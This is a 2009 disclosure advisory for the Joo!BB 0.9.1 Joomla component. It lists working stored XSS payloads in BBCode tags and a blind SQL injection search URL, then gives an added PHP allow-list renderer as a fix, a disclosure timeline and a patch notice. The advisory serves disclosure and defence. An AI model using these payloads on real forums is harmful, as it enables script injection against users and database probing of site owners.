Saturday, 01 August 2009 00:00
The Joomla component Joo!BB 0.9.1 suffers from multiple persistent XSS vulnerabilities in its BBCode implementation, as well as Blind SQL Injection in its search feature.
Nested [img] XSS
[img]http://foo.com/fake.png [img] onerror=javascript:alert(String.fromCharCode(88,83,83)) [/img] [/img]
Nested [url] XSS
[url]http://google.com?[url] onmousemove=javascript:alert(String.fromCharCode(88,83,83));//[/url][/url]
BBCode [color] Tag Injection
[color=#ff0000;font-size:100px;]XSS[/color]
BBCode [url] Location XSS
[url=javascript:alert(String.fromCharCode(88,83,83))]http://google.com[/url]
BBCode [font] Tag Injection
[font=Impact, Compacta, Chicago, sans-serif;color:red;]XSS[/font]
BBCode [table] Tag XSS
[table=border='1' cellspacing='0' cellpadding='0' width='100%'][tr=bgcolor='#ffffff'][td=width='*' onclick='javascript:alert(String.fromCharCode(88,83,83))']XSS[/td][/tr][/table]
Blind SQL Injection
/index.php?tmpl=component&option=com_joobb&view=search&searchwords=%' and SUBSTRING(@@version,1,1)=5 -- '
If MySQL is version 5, this will return results. Otherwise, no results.
These vulnerabilities have been patched, and users are strongly urged to update to 0.9.1 Patch 1.
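In each BBCode payload above, the tag value is used to reach an HTML attribute (an event handler, a style declaration or a javascript: link target). The following is an added example, not Joo!BB's code or its patch: a minimal allow-list renderer that escapes the input first and converts a tag only when its value matches a strict pattern. The function name render_bbcode, the font list and the supported tag set are assumptions.

```php
<?php
// Added example, not Joo!BB code. render_bbcode() is a hypothetical name.
// Input is HTML-escaped first; a tag is converted only when its value matches
// a strict pattern, so anything else is displayed as literal text.
function render_bbcode(string $input): string
{
    // Escape <, >, & and both quote styles before any tag handling.
    $html = htmlspecialchars($input, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

    // http(s) only, no whitespace or brackets: a nested tag or an extra
    // attribute can never become part of an attribute value.
    $url   = 'https?://[^\s\[\]]+';
    $color = '#[0-9a-f]{6}|#[0-9a-f]{3}';
    $font  = 'Arial|Georgia|Impact|Verdana';   // assumed allow-list
    $text  = '[^\[\]]*';                        // tag body without brackets

    $rules = [
        "~\[img\]($url)\[/img\]~i"               => '<img src="$1" alt="">',
        "~\[url\]($url)\[/url\]~i"               => '<a href="$1" rel="nofollow">$1</a>',
        "~\[url=($url)\]($text)\[/url\]~i"       => '<a href="$1" rel="nofollow">$2</a>',
        "~\[color=($color)\]($text)\[/color\]~i" => '<span style="color:$1">$2</span>',
        "~\[font=($font)\]($text)\[/font\]~i"    => '<span style="font-family:$1">$2</span>',
    ];
    // [table] and any tag or value not listed above is left as escaped text.
    return preg_replace(array_keys($rules), array_values($rules), $html);
}

// Constructed check: two payloads quoted in this advisory and two benign posts.
$samples = [
    '[color=#ff0000;font-size:100px;]XSS[/color]',
    '[url=javascript:alert(String.fromCharCode(88,83,83))]http://google.com[/url]',
    '[color=#ff0000]red[/color]',
    '[url=http://example.com/?a=1&b=2]link[/url]',
];
foreach ($samples as $post) {
    echo render_bbcode($post), PHP_EOL;
}
```

The two advisory payloads are printed back as plain escaped text because their values fail the patterns, while the two benign posts become a span and a link.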
Timeline
- Vulnerabilities Discovered: 26 July 2009
- Vendor Notified: 27 July 2009
- Vendor Response: 29 July 2009
- Update Available: 01 August 2009
- Disclosure: 01 August 2009
Last Updated on Thursday, 30 September 2010 17:39
The Joomla!® name is used under a limited license from Open Source Matters in the United States and other countries. Jeff Channell is not affiliated with or endorsed by Open Source Matters or the Joomla!® Project.



